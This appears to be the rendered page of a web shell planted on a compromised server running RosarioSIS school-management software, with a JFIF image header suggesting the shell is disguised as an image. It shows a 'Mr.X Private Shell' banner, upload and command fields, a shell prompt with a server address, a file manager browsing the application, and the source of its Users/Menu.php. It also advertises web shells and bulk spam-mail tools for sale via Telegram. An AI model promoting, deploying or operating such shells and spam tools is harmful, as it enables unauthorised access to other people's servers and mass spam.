����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

eblama1@216.73.217.57: ~ $
<?php
/**
 * Users module Menu entries
 *
 * @uses $menu global var
 *
 * @see  Menu.php in root folder
 *
 * @package RosarioSIS
 * @subpackage modules
 */

$menu['Users']['admin'] = [
	'title' => _( 'Users' ),
	'default' => 'Users/User.php',
	'Users/User.php' => _( 'User Info' ),
	// Note: Do NOT merge with User Info. We'd lose Profile permission to Add.
	'Users/User.php&staff_id=new' => _( 'Add a User' ),
	'Users/AddStudents.php' => _( 'Associate Students with Parents' ),
	'Users/Preferences.php' => _( 'My Preferences' ),
	1 => _( 'Setup' ),
	'Users/Profiles.php' => _( 'User Profiles' ),
	'Users/Exceptions.php' => _( 'User Permissions' ),
	'Users/UserFields.php' => _( 'User Fields' ),
	2 => _( 'Teacher Programs' ),
] + issetVal( $menu['Users']['admin'], [] );

$menu['Users']['teacher'] = [
	'title' => _( 'Users' ),
	'default' => 'Users/User.php',
	'Users/User.php' => _( 'User Info' ),
	'Users/Preferences.php' => _( 'My Preferences' )
] + issetVal( $menu['Users']['teacher'], [] );

$menu['Users']['parent'] = [
	'title' => _( 'Users' ),
	'default' => 'Users/User.php',
	'Users/User.php' => _( 'User Info' ),
	'Users/Preferences.php' => _( 'My Preferences' )
] + issetVal( $menu['Users']['parent'], [] );

// FJ enable password change for students
if ( User( 'PROFILE' ) === 'student' )
	unset( $menu['Users']['parent']['Users/User.php'] );

$exceptions['Users'] = [
	'Users/User.php&staff_id=new' => true
];

Filemanager

Name Type Size Permission Actions
includes Folder 0755
AddStudents.php File 5.04 KB 0644
Exceptions.php File 13.95 KB 0644
Menu.php File 1.39 KB 0644
Preferences.php File 23.53 KB 0644
Profiles.php File 18.58 KB 0644
Search.inc.php File 7.7 KB 0644
TeacherPrograms.php File 4.67 KB 0644
User.php File 20.13 KB 0644
UserFields.php File 8.37 KB 0644